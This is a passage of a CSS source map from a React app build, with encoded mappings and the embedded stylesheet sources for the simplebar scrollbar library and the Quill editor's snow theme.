AsB,CACtB,qBAAsB,CACtB,uBAA4B,CAC5B,UAAW,CACX,gBAAiB,CACjB,kBACF,CACA,4BACE,oBAAqB,CACrB,gBAAiB,CACjB,gBACF,CACA,sCAEE,qBAAsB,CADtB,YAAa,CAEb,cAAe,CACf,WAAY,CACZ,QAAW,CACX,eAAgB,CAChB,WACF,CACA,kCACE,oBAAqB,CACrB,eAAgB,CAChB,iBAAkB,CAClB,sBAAuB,CACvB,kBACF,CACA,uCACE,2BAA4B,CAC5B,cAAe,CACf,gBAAiB,CACjB,iBACF,CACA,wCACE,gBAAiB,CACjB,eACF,CACA,uBACE,gBACF,CACA,yFAEE,YACF,CACA,iDACE,oBACF,CACA,kDACE,cAAiB,CACjB,cAAe,CACf,eACF,CACA,4CACE,qBACF,CACA,+CACE,wBACF,CACA,6CACE,sBACF,CACA,WACE,UACF,CACA,sBACE,qBACF,CC96BA,EAGC,qBAAsB,CACtB,4BAAgC,CAHhC,QAAS,CACT,SAGD,CAEA,KACE,qBACF,CAGA,QAKC,kBAAmB,CAJnB,qBAAuB,CACvB,YAAa,CACb,qBAAsB,CACtB,sBAAuB,CAEvB,YACD,
CAEA,YACC,aAAyB,CACzB,eAAgB,CAEf,eAAgB,CADjB,kBAED,CAEA,WACC,oBAAqB,CACrB,eAED,CAEA,cACC,cAAe,CAGd,eAAgB,CAFjB,UAAW,CACX,WAED,CAEA,oBACE,wBAAiC,CAClC,iBACD,CAEA,WACE,YAAa,CACb,kBAAmB,CAEnB,cAAe,CADf,4BAA6B,CAE7B,eACF,CAEA,uBAEC,aAAyB,CAGzB,eAAgB,CADf,eAAgB,CADjB,kBAAmB,CAGnB,WAAY,CALX,oBAMF,CAQA,uBAGC,cAAgB,CACf,eAAgB,CAFjB,kBAAmB,CADnB,WAID,CAEA,SAEC,cAAe,CADf,oBAED,CAEA,gBACC,kBACD,CAEA,kBACC,aAAyB,CAEzB,kBAAmB,CADnB,SAED,CAEA,wBACC,aACD,CAEA,iBACC,oBAAqB,CAGrB,oBAAqB,CACrB,eAAgB,CAFhB,SAGD,CAEA,oBAEC,aAAsB,CADtB,oBAAqB,CAErB,cAAe,CACf,eACD,CAEA,sBACC,aAAc,CACd,mBACD,CAEA,4BACC,UACD,CAEA,cAIC,oBAAqB,CACrB,2BAA4B,CAF5B,mBAAoB,CAKnB,eAAgB,CADjB,mBAAqB,CAErB,kBAAmB,CAHnB,eAAgB,CAJf,eAAgB,CADjB,WASD,CAEA,kBACC,YAAa,CACb,kBAAmB,CACnB,sBAAuB,CACvB,kBACD,CAEA,yBACC,qBAAuB,CACvB,UAAY,CAGZ,cAAe,CACf,mBAAqB,CAHrB,YAAa,CACb,WAGD,CAEA,QAaC,kBAAmB,CAXnB,qBAAuB,CAEvB,UAAY,CAGZ,aAAyB,CAGzB,YAAa,CACb,kBAAmB,CANnB,iBAAkB,CAGlB,eAAgB,CAIhB,sBAAuB,CAHvB,kBAAmB,CAHnB,YAAa,CALb,iBAAkB,CAElB,UAWD,CAEA,YAEC,qBAAuB,CAKvB,iBAAkB,CAHlB,UAAY,CACZ,iBAAkB,CAFlB,WAAY,CAOX,mBAAe,CAJhB,WAAY,CAEZ,WAGD,CAEA,4BACC,qBAAuB,CAGvB,cAAe,CAGf,iBAAkB,CAFjB,eAAgB,CAGjB,WAAY,CAFX,eAAgB,CAJjB,WAAY,CACZ,WAMD,CAEA,eAEC,wBAA2B,CAD3B,YAGD,CAEA,aAQC,wBAAoC,CALpC,sBAAwB,CACxB,kBAAmB,CAGnB,gBAAiB,CALjB,WAAY,CAGZ,mBAAoB,CACpB,YAAa,CALb,WAQD,CAEA,gBAMC,wBAAmC,CALnC,QAAS,CAET,kBAAmB,CAEnB,eAAiB,CAHjB,WAAY,CAEZ,oBAGD,CAEA,uBACC,iCAA0B,CAA1B,yBACD,CAEA,cAEC,wBAA6B,CAD7B,YAED,CAEA,sBACC,sBACD,CAGA,SACE,YACF,CAEA,eAEE,gBAAiB,CACjB,cAAe,CAFf,WAIF,CAEA,mBAEE,wBAAiC,CADjC,YAAa,CAGb,YAAa,CACb,sBAAuB,CACvB,cAAe,CAHf,WAIF,CAEA,UAME,WAAY,CAJZ,0BAA2B,CAG3B,eAAgB,CADhB,sBAGF,CAEA,sBANE,kBAAmB,CAFnB,YAmBF,CAXA,YASE,iBAAiB,CAPjB,aAAa,CACb,cAAc,CAEd,WAAW,CAKX,mBAAqB,CAFrB,YAAY,CAPZ,oBAAoB,CAGpB,SAOF,CAEA,gBACE,wBACF,CAEA,gBACE,eAAgB,CAChB,UACF,CAEA,cACE,gBACF,CAGA;;iBAGI,gBACJ,CACA,gCACI,cACJ,CACA,gGACI,eACJ,CACA,kBACI,kCAAuC,CACvC,aACJ,CACA,iBACI,kBAAmB,CAInB,mBAAqB,CAHrB,UAAW,CACX,mCAAuC,CACvC,mBAEJ,CACA,sBAGI,eAAgB,CAFhB,UAAY,CAGZ,eAAiB,CAFjB,SAGJ,CACA,iBAEI,WAAY,CADZ,cAEJ,CACA,wBAEI,sCAA4C,CAD5C,iBAEJ,CACA,gBAEI,WAA2C,CAA3C,qCAA2C,CAC3C,aACJ,CAIA,6CASE,YAAa,CAHb,iBAAkB,CAClB,iBAAkB,CAFlB,eAAgB,CAGhB,YAGF,CAEA,UACE,aACF,CAEA,WACE,YAAa,CACb,eAEF,CAEA,eACE,YAAa,CAGb,WAAY,CAFZ,wBAGF,CAEA,gBAQE,wBAAoC,CAGpC,kBAAmB,CAVnB,eAAgB,CAKhB,YAAa,CAGb,eAAgB,CAChB,YAEF,CAEA,4BAME,oBAAqB,CAJrB,YAAa,CACb,qBAAsB,CAFtB,WAAY,CAGZ,OAAQ,CACR,6BAEF,CAEA,+CAEE,cAAe,CADf,eAEF,CAEA,mBAIE,oBAAqB,CAHrB,YAAa,CACb,qBAAsB,CACtB,wBAEF,CAEA,uBAEE,yBAAsC,CACtC,kBAAmB,CAFnB,WAGF,CAEA,wBAEE,sBAAwB,CACxB,kBAAmB,CAEnB,aAAc,CADd,YAEF,CAEA,aAEE,wBAAoC,CADpC,WAEF,CAEA,WACE,wBAAkC,CAClC,UAAY,CACZ,WACF,CAEA,iBACE,wBAAmC,CACnC,cACF,CAEA,kBACE,iCAA0B,CAA1B,yBACF,CAEA,mBAIE,wBAAyB,CACzB,eAAgB,CAFhB,eAAgB,CADhB,WAIF,CAEA,QAEE,YAEF,CAEA,QAGE,kBAAmB,CAFnB,YAAa,CACb,sBAGF,CAEA,GACE,cACF,CAEA,gBAGE,kBAAmB,CAFnB,YAAa,CACb,6BAEF,CAEA,gBAIE,iBACF,CAEA,2BAJE,kBAAmB,CAFnB,YAAa,CACb,sBAUF,CALA,WAIE,WACF,CAEA,sBACE,yBAAsC,CAOtC,kBAAmB,CACnB,kCAA8C,CAL9C,YAAa,CADb,WAAY,CAEZ,0BAA2B,CAE3B,qBAAgB,CALhB,SAQF,CAEA,aAIE,8BAA+B,CAD/B,2BAA4B,CAD5B,WAAY,CAGZ,YAAe,CAJf,SAKF,CAEA,2BAGE,UAAW,CAGX,iBAAmB,CAJnB,SAKF,CAEA,kCACI,UACJ,CAEA,oBASE,sBAAuB,CAHvB,YAAa,CACb,qBAAsB,CALtB,WAAY,CAMZ,wBAAyB,CAJzB,gBAAiB,CACjB,iBAAkB,CAFlB,SAOF,CAEA,2BAKI,kBAAmB,CAHnB,UAAW,CADX,0BAA2B,CAG3B,kBAAmB,CADnB,UAGJ,CAEA,0BAEI,WAAY,CADZ,sBAEJ,CAEA,UACE,eAAgB,CAChB,kBACF,CAEA,sBAGE,WAAY,CAEZ,gBAAiB,CACjB,iBAAkB,CALlB,eAAgB,CAGhB,SAGF,CAEA,6BACI,cACJ,CAEA,4BAEI,WAAY,CADZ,YAEJ,CAEA,YAEE,cAAe,CADf,aAEF,CAEA,mBACI,cACJ,CAEA,aACE,sBAAwB,CACxB,iBAAkB,CAGl
B,WAAY,CADZ,eAAgB,CAEhB,YAAa,CAHb,SAIF,CAEA,oBACI,cAAe,CACf,WACJ,CAEA,6BAGE,WAAY,CAEZ,gBAAiB,CACjB,iBAAkB,CALlB,eAAgB,CAGhB,SAGF,CAEA,mCACI,eACJ,CAEA,wBAIE,wBAAyB,CAGzB,QAAW,CAJX,iBAAkB,CAElB,UAAY,CAGZ,cAAe,CAFf,cAAe,CAJf,YAAa,CADb,SAQF,CAEA,+BACE,iCAA0B,CAA1B,yBACF,CAOA,2CAJE,aAAsB,CACtB,gBASF,CANA,sBAGE,WAAY,CACZ,iBAAkB,CAClB,eACF,CAEA,eAEI,iBAAkB,CAGlB,yBAAkB,CAJlB,YAKJ,CAEA,gBACE,gBAAiB,CACjB,mBACF,CAEA,cACE,yBAAsC,CAEtC,kBAAmB,CAEnB,kCAA8C,CAH9C,eAAgB,CAEhB,YAEF,CAEA,qBACE,gBAAiB,CACjB,kBACF,CAEA,sBACE,YACF,CAEA,gCACE,oBAAqB,CAGrB,cAAe,CAFf,eAAgB,CAChB,mBAAqB,CAErB,iBAAkB,CAClB,gBACF,CAEA,iCASE,wBAAoC,CADpC,wBAAoC,CADpC,kBAAmB,CANnB,WAAY,CAKZ,kBAAmB,CAHnB,kBAAmB,CADnB,gBAAiB,CAGjB,YAAa,CADb,WAMF,CAEA,aACE,QACF,CAEA,kCAQE,wBAAyB,CADzB,QAAS,CADT,kBAAmB,CAInB,UAAY,CACZ,cAAe,CAFf,cAAe,CAPf,WAAY,CAGZ,kBAAmB,CAJnB,gBAAiB,CAGjB,YAAa,CADb,WASF,CAEA,SAEE,qBAAuB,CADvB,aAEF,CAEA,eAGE,iBAAkB,CAFlB,eAAgB,CAGhB,YACF,CACA,oBACE,wBAAyB,CAEzB,oBAAqB,CACrB,gBACF","sources":["../node_modules/simplebar/src/simplebar.css","../node_modules/react-quill/dist/quill.snow.css","pages/App.css"],"sourcesContent":["[data-simplebar] {\n position: relative;\n flex-direction: column;\n flex-wrap: wrap;\n justify-content: flex-start;\n align-content: flex-start;\n align-items: flex-start;\n}\n\n.simplebar-wrapper {\n overflow: hidden;\n width: inherit;\n height: inherit;\n max-width: inherit;\n max-height: inherit;\n}\n\n.simplebar-mask {\n direction: inherit;\n position: absolute;\n overflow: hidden;\n padding: 0;\n margin: 0;\n left: 0;\n top: 0;\n bottom: 0;\n right: 0;\n width: auto !important;\n height: auto !important;\n z-index: 0;\n}\n\n.simplebar-offset {\n direction: inherit !important;\n box-sizing: inherit !important;\n resize: none !important;\n position: absolute;\n top: 0;\n left: 0;\n bottom: 0;\n right: 0;\n padding: 0;\n margin: 0;\n -webkit-overflow-scrolling: touch;\n}\n\n.simplebar-content-wrapper {\n direction: inherit;\n box-sizing: border-box !important;\n position: relative;\n display: block;\n height: 100%; /* Required for horizontal native scrollbar to not appear if parent is taller than natural height */\n width: auto;\n max-width: 100%; /* Not required for horizontal scroll to trigger */\n max-height: 100%; /* Needed for vertical scroll to trigger */\n scrollbar-width: none;\n -ms-overflow-style: none;\n}\n\n.simplebar-content-wrapper::-webkit-scrollbar,\n.simplebar-hide-scrollbar::-webkit-scrollbar {\n width: 0;\n height: 0;\n}\n\n.simplebar-content:before,\n.simplebar-content:after {\n content: ' ';\n display: table;\n}\n\n.simplebar-placeholder {\n max-height: 100%;\n max-width: 100%;\n width: 100%;\n pointer-events: none;\n}\n\n.simplebar-height-auto-observer-wrapper {\n box-sizing: inherit !important;\n height: 100%;\n width: 100%;\n max-width: 1px;\n position: relative;\n float: left;\n max-height: 1px;\n overflow: hidden;\n z-index: -1;\n padding: 0;\n margin: 0;\n pointer-events: none;\n flex-grow: inherit;\n flex-shrink: 0;\n flex-basis: 0;\n}\n\n.simplebar-height-auto-observer {\n box-sizing: inherit;\n display: block;\n opacity: 0;\n position: absolute;\n top: 0;\n left: 0;\n height: 1000%;\n width: 1000%;\n min-height: 1px;\n min-width: 1px;\n overflow: hidden;\n pointer-events: none;\n z-index: -1;\n}\n\n.simplebar-track {\n z-index: 1;\n position: absolute;\n right: 0;\n bottom: 0;\n pointer-events: none;\n overflow: hidden;\n}\n\n[data-simplebar].simplebar-dragging .simplebar-content {\n pointer-events: none;\n user-select: none;\n -webkit-user-select: 
none;\n}\n\n[data-simplebar].simplebar-dragging .simplebar-track {\n pointer-events: all;\n}\n\n.simplebar-scrollbar {\n position: absolute;\n left: 0;\n right: 0;\n min-height: 10px;\n}\n\n.simplebar-scrollbar:before {\n position: absolute;\n content: '';\n background: black;\n border-radius: 7px;\n left: 2px;\n right: 2px;\n opacity: 0;\n transition: opacity 0.2s linear;\n}\n\n.simplebar-scrollbar.simplebar-visible:before {\n /* When hovered, remove all transitions from drag handle */\n opacity: 0.5;\n transition: opacity 0s linear;\n}\n\n.simplebar-track.simplebar-vertical {\n top: 0;\n width: 11px;\n}\n\n.simplebar-track.simplebar-vertical .simplebar-scrollbar:before {\n top: 2px;\n bottom: 2px;\n}\n\n.simplebar-track.simplebar-horizontal {\n left: 0;\n height: 11px;\n}\n\n.simplebar-track.simplebar-horizontal .simplebar-scrollbar:before {\n height: 100%;\n left: 2px;\n right: 2px;\n}\n\n.simplebar-track.simplebar-horizontal .simplebar-scrollbar {\n right: auto;\n left: 0;\n top: 2px;\n height: 7px;\n min-height: 0;\n min-width: 10px;\n width: auto;\n}\n\n/* Rtl support */\n[data-simplebar-direction='rtl'] .simplebar-track.simplebar-vertical {\n right: auto;\n left: 0;\n}\n\n.hs-dummy-scrollbar-size {\n direction: rtl;\n position: fixed;\n opacity: 0;\n visibility: hidden;\n height: 500px;\n width: 500px;\n overflow-y: hidden;\n overflow-x: scroll;\n}\n\n.simplebar-hide-scrollbar {\n position: fixed;\n left: 0;\n visibility: hidden;\n overflow-y: scroll;\n scrollbar-width: none;\n -ms-overflow-style: none;\n}\n","/*!\n * Quill Editor v1.3.7\n * https://quilljs.com/\n * Copyright (c) 2014, Jason Chen\n * Copyright (c) 2013, salesforce.com\n */\n.ql-container {\n box-sizing: border-box;\n font-family: Helvetica, Arial, sans-serif;\n font-size: 13px;\n height: 100%;\n margin: 0px;\n position: relative;\n}\n.ql-container.ql-disabled .ql-tooltip {\n visibility: hidden;\n}\n.ql-container.ql-disabled .ql-editor ul[data-checked] > li::before {\n pointer-events: none;\n}\n.ql-clipboard {\n left: -100000px;\n height: 1px;\n overflow-y: hidden;\n position: absolute;\n top: 50%;\n}\n.ql-clipboard p {\n margin: 0;\n padding: 0;\n}\n.ql-editor {\n box-sizing: border-box;\n line-height: 1.42;\n height: 100%;\n outline: none;\n overflow-y: auto;\n padding: 12px 15px;\n tab-size: 4;\n -moz-tab-size: 4;\n text-align: left;\n white-space: pre-wrap;\n word-wrap: break-word;\n}\n.ql-editor > * {\n cursor: text;\n}\n.ql-editor p,\n.ql-editor ol,\n.ql-editor ul,\n.ql-editor pre,\n.ql-editor blockquote,\n.ql-editor h1,\n.ql-editor h2,\n.ql-editor h3,\n.ql-editor h4,\n.ql-editor h5,\n.ql-editor h6 {\n margin: 0;\n padding: 0;\n counter-reset: list-1 list-2 list-3 list-4 list-5 list-6 list-7 list-8 list-9;\n}\n.ql-editor ol,\n.ql-editor ul {\n padding-left: 1.5em;\n}\n.ql-editor ol > li,\n.ql-editor ul > li {\n list-style-type: none;\n}\n.ql-editor ul > li::before {\n content: '\\2022';\n}\n.ql-editor ul[data-checked=true],\n.ql-editor ul[data-checked=false] {\n pointer-events: none;\n}\n.ql-editor ul[data-checked=true] > li *,\n.ql-editor ul[data-checked=false] > li * {\n pointer-events: all;\n}\n.ql-editor ul[data-checked=true] > li::before,\n.ql-editor ul[data-checked=false] > li::before {\n color: #777;\n cursor: pointer;\n pointer-events: all;\n}\n.ql-editor ul[data-checked=true] > li::before {\n content: '\\2611';\n}\n.ql-editor ul[data-checked=false] > li::before {\n content: '\\2610';\n}\n.ql-editor li::before {\n display: inline-block;\n white-space: nowrap;\n width: 1.2em;\n}\n.ql-editor 
li:not(.ql-direction-rtl)::before {\n margin-left: -1.5em;\n margin-right: 0.3em;\n text-align: right;\n}\n.ql-editor li.ql-direction-rtl::before {\n margin-left: 0.3em;\n margin-right: -1.5em;\n}\n.ql-editor ol li:not(.ql-direction-rtl),\n.ql-editor ul li:not(.ql-direction-rtl) {\n padding-left: 1.5em;\n}\n.ql-editor ol li.ql-direction-rtl,\n.ql-editor ul li.ql-direction-rtl {\n padding-right: 1.5em;\n}\n.ql-editor ol li {\n counter-reset: list-1 list-2 list-3 list-4 list-5 list-6 list-7 list-8 list-9;\n counter-increment: list-0;\n}\n.ql-editor ol li:before {\n content: counter(list-0, decimal) '. ';\n}\n.ql-editor ol li.ql-indent-1 {\n counter-increment: list-1;\n}\n.ql-editor ol li.ql-indent-1:before {\n content: counter(list-1, lower-alpha) '. ';\n}\n.ql-editor ol li.ql-indent-1 {\n counter-reset: list-2 list-3 list-4 list-5 list-6 list-7 list-8 list-9;\n}\n.ql-editor ol li.ql-indent-2 {\n counter-increment: list-2;\n}\n.ql-editor ol li.ql-indent-2:before {\n content: counter(list-2, lower-roman) '. ';\n}\n.ql-editor ol li.ql-indent-2 {\n counter-reset: list-3 list-4 list-5 list-6 list-7 list-8 list-9;\n}\n.ql-editor ol li.ql-indent-3 {\n counter-increment: list-3;\n}\n.ql-editor ol li.ql-indent-3:before {\n content: counter(list-3, decimal) '. ';\n}\n.ql-editor ol li.ql-indent-3 {\n counter-reset: list-4 list-5 list-6 list-7 list-8 list-9;\n}\n.ql-editor ol li.ql-indent-4 {\n counter-increment: list-4;\n}\n.ql-editor ol li.ql-indent-4:before {\n content: counter(list-4, lower-alpha) '. ';\n}\n.ql-editor ol li.ql-indent-4 {\n counter-reset: list-5 list-6 list-7 list-8 list-9;\n}\n.ql-editor ol li.ql-indent-5 {\n counter-increment: list-5;\n}\n.ql-editor ol li.ql-indent-5:before {\n content: counter(list-5, lower-roman) '. ';\n}\n.ql-editor ol li.ql-indent-5 {\n counter-reset: list-6 list-7 list-8 list-9;\n}\n.ql-editor ol li.ql-indent-6 {\n counter-increment: list-6;\n}\n.ql-editor ol li.ql-indent-6:before {\n content: counter(list-6, decimal) '. ';\n}\n.ql-editor ol li.ql-indent-6 {\n counter-reset: list-7 list-8 list-9;\n}\n.ql-editor ol li.ql-indent-7 {\n counter-increment: list-7;\n}\n.ql-editor ol li.ql-indent-7:before {\n content: counter(list-7, lower-alpha) '. ';\n}\n.ql-editor ol li.ql-indent-7 {\n counter-reset: list-8 list-9;\n}\n.ql-editor ol li.ql-indent-8 {\n counter-increment: list-8;\n}\n.ql-editor ol li.ql-indent-8:before {\n content: counter(list-8, lower-roman) '. ';\n}\n.ql-editor ol li.ql-indent-8 {\n counter-reset: list-9;\n}\n.ql-editor ol li.ql-indent-9 {\n counter-increment: list-9;\n}\n.ql-editor ol li.ql-indent-9:before {\n content: counter(list-9, decimal) '. 
';\n}\n.ql-editor .ql-indent-1:not(.ql-direction-rtl) {\n padding-left: 3em;\n}\n.ql-editor li.ql-indent-1:not(.ql-direction-rtl) {\n padding-left: 4.5em;\n}\n.ql-editor .ql-indent-1.ql-direction-rtl.ql-align-right {\n padding-right: 3em;\n}\n.ql-editor li.ql-indent-1.ql-direction-rtl.ql-align-right {\n padding-right: 4.5em;\n}\n.ql-editor .ql-indent-2:not(.ql-direction-rtl) {\n padding-left: 6em;\n}\n.ql-editor li.ql-indent-2:not(.ql-direction-rtl) {\n padding-left: 7.5em;\n}\n.ql-editor .ql-indent-2.ql-direction-rtl.ql-align-right {\n padding-right: 6em;\n}\n.ql-editor li.ql-indent-2.ql-direction-rtl.ql-align-right {\n padding-right: 7.5em;\n}\n.ql-editor .ql-indent-3:not(.ql-direction-rtl) {\n padding-left: 9em;\n}\n.ql-editor li.ql-indent-3:not(.ql-direction-rtl) {\n padding-left: 10.5em;\n}\n.ql-editor .ql-indent-3.ql-direction-rtl.ql-align-right {\n padding-right: 9em;\n}\n.ql-editor li.ql-indent-3.ql-direction-rtl.ql-align-right {\n padding-right: 10.5em;\n}\n.ql-editor .ql-indent-4:not(.ql-direction-rtl) {\n padding-left: 12em;\n}\n.ql-editor li.ql-indent-4:not(.ql-direction-rtl) {\n padding-left: 13.5em;\n}\n.ql-editor .ql-indent-4.ql-direction-rtl.ql-align-right {\n padding-right: 12em;\n}\n.ql-editor li.ql-indent-4.ql-direction-rtl.ql-align-right {\n padding-right: 13.5em;\n}\n.ql-editor .ql-indent-5:not(.ql-direction-rtl) {\n padding-left: 15em;\n}\n.ql-editor li.ql-indent-5:not(.ql-direction-rtl) {\n padding-left: 16.5em;\n}\n.ql-editor .ql-indent-5.ql-direction-rtl.ql-align-right {\n padding-right: 15em;\n}\n.ql-editor li.ql-indent-5.ql-direction-rtl.ql-align-right {\n padding-right: 16.5em;\n}\n.ql-editor .ql-indent-6:not(.ql-direction-rtl) {\n padding-left: 18em;\n}\n.ql-editor li.ql-indent-6:not(.ql-direction-rtl) {\n padding-left: 19.5em;\n}\n.ql-editor .ql-indent-6.ql-direction-rtl.ql-align-right {\n padding-right: 18em;\n}\n.ql-editor li.ql-indent-6.ql-direction-rtl.ql-align-right {\n padding-right: 19.5em;\n}\n.ql-editor .ql-indent-7:not(.ql-direction-rtl) {\n padding-left: 21em;\n}\n.ql-editor li.ql-indent-7:not(.ql-direction-rtl) {\n padding-left: 22.5em;\n}\n.ql-editor .ql-indent-7.ql-direction-rtl.ql-align-right {\n padding-right: 21em;\n}\n.ql-editor li.ql-indent-7.ql-direction-rtl.ql-align-right {\n padding-right: 22.5em;\n}\n.ql-editor .ql-indent-8:not(.ql-direction-rtl) {\n padding-left: 24em;\n}\n.ql-editor li.ql-indent-8:not(.ql-direction-rtl) {\n padding-left: 25.5em;\n}\n.ql-editor .ql-indent-8.ql-direction-rtl.ql-align-right {\n padding-right: 24em;\n}\n.ql-editor li.ql-indent-8.ql-direction-rtl.ql-align-right {\n padding-right: 25.5em;\n}\n.ql-editor .ql-indent-9:not(.ql-direction-rtl) {\n padding-left: 27em;\n}\n.ql-editor li.ql-indent-9:not(.ql-direction-rtl) {\n padding-left: 28.5em;\n}\n.ql-editor .ql-indent-9.ql-direction-rtl.ql-align-right {\n padding-right: 27em;\n}\n.ql-editor li.ql-indent-9.ql-direction-rtl.ql-align-right {\n padding-right: 28.5em;\n}\n.ql-editor .ql-video {\n display: block;\n max-width: 100%;\n}\n.ql-editor .ql-video.ql-align-center {\n margin: 0 auto;\n}\n.ql-editor .ql-video.ql-align-right {\n margin: 0 0 0 auto;\n}\n.ql-editor .ql-bg-black {\n background-color: #000;\n}\n.ql-editor .ql-bg-red {\n background-color: #e60000;\n}\n.ql-editor .ql-bg-orange {\n background-color: #f90;\n}\n.ql-editor .ql-bg-yellow {\n background-color: #ff0;\n}\n.ql-editor .ql-bg-green {\n background-color: #008a00;\n}\n.ql-editor .ql-bg-blue {\n background-color: #06c;\n}\n.ql-editor .ql-bg-purple {\n background-color: #93f;\n}\n.ql-editor 
.ql-color-white {\n color: #fff;\n}\n.ql-editor .ql-color-red {\n color: #e60000;\n}\n.ql-editor .ql-color-orange {\n color: #f90;\n}\n.ql-editor .ql-color-yellow {\n color: #ff0;\n}\n.ql-editor .ql-color-green {\n color: #008a00;\n}\n.ql-editor .ql-color-blue {\n color: #06c;\n}\n.ql-editor .ql-color-purple {\n color: #93f;\n}\n.ql-editor .ql-font-serif {\n font-family: Georgia, Times New Roman, serif;\n}\n.ql-editor .ql-font-monospace {\n font-family: Monaco, Courier New, monospace;\n}\n.ql-editor .ql-size-small {\n font-size: 0.75em;\n}\n.ql-editor .ql-size-large {\n font-size: 1.5em;\n}\n.ql-editor .ql-size-huge {\n font-size: 2.5em;\n}\n.ql-editor .ql-direction-rtl {\n direction: rtl;\n text-align: inherit;\n}\n.ql-editor .ql-align-center {\n text-align: center;\n}\n.ql-editor .ql-align-justify {\n text-align: justify;\n}\n.ql-editor .ql-align-right {\n text-align: right;\n}\n.ql-editor.ql-blank::before {\n color: rgba(0,0,0,0.6);\n content: attr(data-placeholder);\n font-style: italic;\n left: 15px;\n pointer-events: none;\n position: absolute;\n right: 15px;\n}\n.ql-snow.ql-toolbar:after,\n.ql-snow .ql-toolbar:after {\n clear: both;\n content: '';\n display: table;\n}\n.ql-snow.ql-toolbar button,\n.ql-snow .ql-toolbar button {\n background: none;\n border: none;\n cursor: pointer;\n display: inline-block;\n float: left;\n height: 24px;\n padding: 3px 5px;\n width: 28px;\n}\n.ql-snow.ql-toolbar button svg,\n.ql-snow .ql-toolbar button svg {\n float: left;\n height: 100%;\n}\n.ql-snow.ql-toolbar button:active:hover,\n.ql-snow .ql-toolbar button:active:hover {\n outline: none;\n}\n.ql-snow.ql-toolbar input.ql-image[type=file],\n.ql-snow .ql-toolbar input.ql-image[type=file] {\n display: none;\n}\n.ql-snow.ql-toolbar button:hover,\n.ql-snow .ql-toolbar button:hover,\n.ql-snow.ql-toolbar button:focus,\n.ql-snow .ql-toolbar button:focus,\n.ql-snow.ql-toolbar button.ql-active,\n.ql-snow .ql-toolbar button.ql-active,\n.ql-snow.ql-toolbar .ql-picker-label:hover,\n.ql-snow .ql-toolbar .ql-picker-label:hover,\n.ql-snow.ql-toolbar .ql-picker-label.ql-active,\n.ql-snow .ql-toolbar .ql-picker-label.ql-active,\n.ql-snow.ql-toolbar .ql-picker-item:hover,\n.ql-snow .ql-toolbar .ql-picker-item:hover,\n.ql-snow.ql-toolbar .ql-picker-item.ql-selected,\n.ql-snow .ql-toolbar .ql-picker-item.ql-selected {\n color: #06c;\n}\n.ql-snow.ql-toolbar button:hover .ql-fill,\n.ql-snow .ql-toolbar button:hover .ql-fill,\n.ql-snow.ql-toolbar button:focus .ql-fill,\n.ql-snow .ql-toolbar button:focus .ql-fill,\n.ql-snow.ql-toolbar button.ql-active .ql-fill,\n.ql-snow .ql-toolbar button.ql-active .ql-fill,\n.ql-snow.ql-toolbar .ql-picker-label:hover .ql-fill,\n.ql-snow .ql-toolbar .ql-picker-label:hover .ql-fill,\n.ql-snow.ql-toolbar .ql-picker-label.ql-active .ql-fill,\n.ql-snow .ql-toolbar .ql-picker-label.ql-active .ql-fill,\n.ql-snow.ql-toolbar .ql-picker-item:hover .ql-fill,\n.ql-snow .ql-toolbar .ql-picker-item:hover .ql-fill,\n.ql-snow.ql-toolbar .ql-picker-item.ql-selected .ql-fill,\n.ql-snow .ql-toolbar .ql-picker-item.ql-selected .ql-fill,\n.ql-snow.ql-toolbar button:hover .ql-stroke.ql-fill,\n.ql-snow .ql-toolbar button:hover .ql-stroke.ql-fill,\n.ql-snow.ql-toolbar button:focus .ql-stroke.ql-fill,\n.ql-snow .ql-toolbar button:focus .ql-stroke.ql-fill,\n.ql-snow.ql-toolbar button.ql-active .ql-stroke.ql-fill,\n.ql-snow .ql-toolbar button.ql-active .ql-stroke.ql-fill,\n.ql-snow.ql-toolbar .ql-picker-label:hover .ql-stroke.ql-fill,\n.ql-snow .ql-toolbar .ql-picker-label:hover 
.ql-stroke.ql-fill,\n.ql-snow.ql-toolbar .ql-picker-label.ql-active .ql-stroke.ql-fill,\n.ql-snow .ql-toolbar .ql-picker-label.ql-active .ql-stroke.ql-fill,\n.ql-snow.ql-toolbar .ql-picker-item:hover .ql-stroke.ql-fill,\n.ql-snow .ql-toolbar .ql-picker-item:hover .ql-stroke.ql-fill,\n.ql-snow.ql-toolbar .ql-picker-item.ql-selected .ql-stroke.ql-fill,\n.ql-snow .ql-toolbar .ql-picker-item.ql-selected .ql-stroke.ql-fill {\n fill: #06c;\n}\n.ql-snow.ql-toolbar button:hover .ql-stroke,\n.ql-snow .ql-toolbar button:hover .ql-stroke,\n.ql-snow.ql-toolbar button:focus .ql-stroke,\n.ql-snow .ql-toolbar button:focus .ql-stroke,\n.ql-snow.ql-toolbar button.ql-active .ql-stroke,\n.ql-snow .ql-toolbar button.ql-active .ql-stroke,\n.ql-snow.ql-toolbar .ql-picker-label:hover .ql-stroke,\n.ql-snow .ql-toolbar .ql-picker-label:hover .ql-stroke,\n.ql-snow.ql-toolbar .ql-picker-label.ql-active .ql-stroke,\n.ql-snow .ql-toolbar .ql-picker-label.ql-active .ql-stroke,\n.ql-snow.ql-toolbar .ql-picker-item:hover .ql-stroke,\n.ql-snow .ql-toolbar .ql-picker-item:hover .ql-stroke,\n.ql-snow.ql-toolbar .ql-picker-item.ql-selected .ql-stroke,\n.ql-snow .ql-toolbar .ql-picker-item.ql-selected .ql-stroke,\n.ql-snow.ql-toolbar button:hover .ql-stroke-miter,\n.ql-snow .ql-toolbar button:hover .ql-stroke-miter,\n.ql-snow.ql-toolbar button:focus .ql-stroke-miter,\n.ql-snow .ql-toolbar button:focus .ql-stroke-miter,\n.ql-snow.ql-toolbar button.ql-active .ql-stroke-miter,\n.ql-snow .ql-toolbar button.ql-active .ql-stroke-miter,\n.ql-snow.ql-toolbar .ql-picker-label:hover .ql-stroke-miter,\n.ql-snow .ql-toolbar .ql-picker-label:hover .ql-stroke-miter,\n.ql-snow.ql-toolbar .ql-picker-label.ql-active .ql-stroke-miter,\n.ql-snow .ql-toolbar .ql-picker-label.ql-active .ql-stroke-miter,\n.ql-snow.ql-toolbar .ql-picker-item:hover .ql-stroke-miter,\n.ql-snow .ql-toolbar .ql-picker-item:hover .ql-stroke-miter,\n.ql-snow.ql-toolbar .ql-picker-item.ql-selected .ql-stroke-miter,\n.ql-snow .ql-toolbar .ql-picker-item.ql-selected .ql-stroke-miter {\n stroke: #06c;\n}\n@media (pointer: coarse) {\n .ql-snow.ql-toolbar button:hover:not(.ql-active),\n .ql-snow .ql-toolbar button:hover:not(.ql-active) {\n color: #444;\n }\n .ql-snow.ql-toolbar button:hover:not(.ql-active) .ql-fill,\n .ql-snow .ql-toolbar 